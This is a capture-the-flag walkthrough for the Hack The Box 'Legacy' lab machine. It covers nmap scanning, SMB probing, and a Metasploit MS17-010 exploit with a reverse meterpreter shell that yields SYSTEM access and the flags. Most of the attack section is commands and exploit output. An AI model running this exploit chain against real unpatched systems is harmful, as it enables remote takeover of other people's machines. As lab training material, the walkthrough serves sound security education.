Legacy
Initial Enumeration
Nmap
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n 10.10.10.4
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-10-20 20:41 EDT
Nmap scan report for 10.10.10.4
Host is up (0.16s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 18.17 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n 10.10.10.4 -p135,139,445 -sV -A
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-10-20 20:42 EDT
Nmap scan report for 10.10.10.4
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5d00h27m41s, deviation: 2h07m16s, median: 4d22h57m41s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:3e:06 (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\\x00
| Workgroup: HTB\\x00
|_ System time: 2024-10-26T05:40:07+03:00
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 18.04 secondsRunning our initial Nmap scan, we are able to identify 2 services open → RPC as well as SMB.
SMB
Looking through the SMB service, we will first attempt to see if we are able to anonymously log in.
┌──(kali㉿kali)-[~]
└─$ smbclient -N -L 10.10.10.4
session setup failed: NT_STATUS_INVALID_PARAMETER
┌──(kali㉿kali)-[~]
└─$ smbclient -N -L 10.10.10.4 -m SMB1
WARNING: Ignoring invalid value 'SMB1' for parameter 'client max protocol'
session setup failed: NT_STATUS_INVALID_PARAMETERInitial Foothold
Both our attempts to log into the SMB protocol seems to be useless. However, we realized that our SMB service is running an outdated version on Windows XP (Windows 2000 LAN Manager), and there should potentially be an exploit for us to utilize. We will search for something on metasploit:
┌──(kali㉿kali)-[~]
└─$ msfconsole
Metasploit tip: You can pivot connections over sessions started with the
ssh_login modules
____________
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
[% .--------..-----.| |_ .---.-.| .,a$%|.-----.| |.-----.|__|| |_ %%]
[% | || -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%]
[% |__|__|__||_____||____||___._||%$P"` || __||__||_____||__||____|%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
=[ metasploit v6.4.18-dev ]
+ -- --=[ 2437 exploits - 1255 auxiliary - 429 post ]
+ -- --=[ 1471 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: <https://docs.metasploit.com/>
msf6 > search eternal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 \\_ target: Automatic Target . . . .
2 \\_ target: Windows 7 . . . .
3 \\_ target: Windows Embedded Standard 7 . . . .
4 \\_ target: Windows Server 2008 R2 . . . .
5 \\_ target: Windows 8 . . . .
6 \\_ target: Windows 8.1 . . . .
7 \\_ target: Windows Server 2012 . . . .
8 \\_ target: Windows 10 Pro . . . .
9 \\_ target: Windows 10 Enterprise Evaluation . . . .
10 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
11 \\_ target: Automatic . . . .
12 \\_ target: PowerShell . . . .
13 \\_ target: Native upload . . . .
14 \\_ target: MOF upload . . . .
15 \\_ AKA: ETERNALSYNERGY . . . .
16 \\_ AKA: ETERNALROMANCE . . . .
17 \\_ AKA: ETERNALCHAMPION . . . .
18 \\_ AKA: ETERNALBLUE . . . .
19 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
20 \\_ AKA: ETERNALSYNERGY . . . .
21 \\_ AKA: ETERNALROMANCE . . . .
22 \\_ AKA: ETERNALCHAMPION . . . .
23 \\_ AKA: ETERNALBLUE . . . .
24 auxiliary/scanner/smb/smb_ms17_010 . normal No MS17-010 SMB RCE Detection
25 \\_ AKA: DOUBLEPULSAR . . . .
26 \\_ AKA: ETERNALBLUE . . . .
27 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
28 \\_ target: Execute payload (x64) . . . .
29 \\_ target: Neutralize implant . . . .
Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'
msf6 > use 10
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/da yes List of named pipes to check
ta/wordlists/named_pipes.txt
RHOSTS yes The target host(s), see <https://docs.metasploit.com/docs/usi>
ng-metasploit/basics/using-metasploit.html
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,..
.) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.106.130 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST 10.10.14.3
LHOST => 10.10.14.3
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 - [*] Preparing dynamite...
[*] 10.10.10.4:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 - [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x860201f0
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... OZTTnpvm.exe
[*] 10.10.10.4:445 - Created \\OZTTnpvm.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (176198 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \\OZTTnpvm.exe...
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.4:1039) at 2024-10-20 21:12:28 -0400
meterpreter >
From the metasploit terminal, we are able to note that this windows server version is vulnerable to the eternalblue exploit. We are able to gain a shell into our SMB service.
meterpreter > shell
Process 252 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\\WINDOWS\\system32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.
C:\\WINDOWS\\system32>cd C:\\
cd C:\\
C:\\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\\
16/03/2017 08:30 �� 0 AUTOEXEC.BAT
16/03/2017 08:30 �� 0 CONFIG.SYS
16/03/2017 09:07 �� <DIR> Documents and Settings
29/12/2017 11:41 �� <DIR> Program Files
26/10/2024 06:10 �� <DIR> WINDOWS
2 File(s) 0 bytes
3 Dir(s) 6.342.569.984 bytes free
C:\\>cd Documents and Settings
C:\\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\\Documents and Settings
16/03/2017 09:07 �� <DIR> .
16/03/2017 09:07 �� <DIR> ..
16/03/2017 09:07 �� <DIR> Administrator
16/03/2017 08:29 �� <DIR> All Users
16/03/2017 08:33 �� <DIR> john
0 File(s) 0 bytes
5 Dir(s) 6.342.557.696 bytes free
C:\\Documents and Settings>cd john
cd john
C:\\Documents and Settings\\john> dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\\Documents and Settings\\john
16/03/2017 08:33 �� <DIR> .
16/03/2017 08:33 �� <DIR> ..
16/03/2017 09:19 �� <DIR> Desktop
16/03/2017 08:33 �� <DIR> Favorites
16/03/2017 08:33 �� <DIR> My Documents
16/03/2017 08:20 �� <DIR> Start Menu
0 File(s) 0 bytes
6 Dir(s) 6.342.553.600 bytes free
C:\\Documents and Settings\\john>cd Desktop
cd Desktop
C:\\Documents and Settings\\john\\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\\Documents and Settings\\john\\Desktop
16/03/2017 09:19 �� <DIR> .
16/03/2017 09:19 �� <DIR> ..
16/03/2017 09:19 �� 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 6.342.553.600 bytes free
C:\\Documents and Settings\\john\\Desktop>type user.txt
type user.txt
e69af0e4f443de7e36876fda4ec7644f
C:\\Documents and Settings\\john\\Desktop>cd ..
cd ..
C:\\Documents and Settings\\john> cd ..
cd ..
C:\\Documents and Settings>cd Administrator
cd Administrator
C:\\Documents and Settings\\Administrator>cd Desktop
cd Desktop
C:\\Documents and Settings\\Administrator\\Desktop>type root.txt
type root.txt
993442d258b0e0ec917cae9e695d5713e69af0e4f443de7e36876fda4ec7644f
993442d258b0e0ec917cae9e695d5713
Last updated